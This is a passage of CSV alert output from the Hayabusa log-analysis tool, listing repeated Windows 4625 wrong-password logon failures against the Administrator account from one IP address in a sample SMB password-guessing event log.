NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EMvTo7fU6J468WE9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8gzx6Vr9LoInM1df : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kwXC2S4HwdwNE6SX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1pQa1WxSt3bj9LEv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fm65jq9tRQznmWPh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zd8BJbXvEoaDADLc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: P0JlFw7S6jFUt4Iy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:32.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rfMbFXQcP5sA2wmf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xu4pgyCcDjl9h0Et : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B00w8dZG3sT2Lsqo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.450 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8aKGq6qrchp4SLvT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.568 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XnScYHBCKOSHItsi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r8UMBM326M7a4njd : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kTdYWOi6p7etRfya : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.691 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JWSlcEVzj5lGtVg0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xc77wukLTPOYAzj2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w4WmTwTGuwDN6YXn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aeN4cSffFA04oOje : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:32.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eYFPV1kGALqX8jyO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qIlhxT4qqo5bCsU3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: btoOskH0112h7MTO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nWUhQJBcS7XbMJUq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E70qmXDDWqmWJjyU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oX0L8wf6nt2grLvn : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0D8BwniiXsjfkYqE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sSWYo4mphuvKHQHl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: im8an1mDle9f8skd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aOyLWd5CAAjnJt3C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.240 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s7gI55uWlshCLw3y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:33.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l7UogJ8bBw6Epbht : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qIl0QRFHXCVAHWdV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OxPv9v4TxFvS9JMy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uHMGfCorrLXpDyeD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KQTKgFibIa8NWExO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.492 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rEnx3upH3Om0wHn7 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KlNbW1ljPSTdgUKY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w2WMd3HugfjSwJPJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yEy0C6dMhysbNDrX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vxlayd8pnAZ3dZ2Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PhKO1jyWqVEdC9w2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:33.736 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dAH2mHJ4ZK5GS2p0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lV2ZIWGGwlkyEMRB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.811 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sum2yMFio9KLwZk5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fICXSRvv9Vm0uVpY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.894 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IgrOk6Fjp0QtfJ3i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OPKoHLtxNoiG65sl : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NctXRH1DR3slfVxQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vLnAs36K1mTivu2w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H7crZQ0eQ5RDNIp7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yHjgGhEtZgNwjaii : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y5gi2SS2mQiDylQ8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:34.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kqWJGguiWBEplJiZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RWP4luPa3lFolQVI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5K9DQWbzslRZZMSC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5qm0L113v24jlfjx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.360 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: seuUjyGmNlyYT4tU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FljAF4LWLmWNa3kL : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.447 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RnN5mBOaAvYu25G7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: llBt31S46QVzg0Ki : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b1rvJUZo91Kka0G1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7Zqi86ZSFGRnoFM4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GeyeVdCUmHEKxR8f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:34.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DwxJVXt79KBZalqS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TDfRu1OTlHmyc38P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OLCAMPDWti9hjHtV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.833 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k2eViuJeorX2peGP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: davOE9p1fF2LbDP7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.922 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YFQsEbZnm94eSuUl : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UnNcBIPoWdJH0x7M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.997 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8Fw1xVFyar0Cal2J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.040 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FWzn4Oa8PQdH9Gqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b68beIB5BKyMv8d3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HeXSJhEXzpiRX8BT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
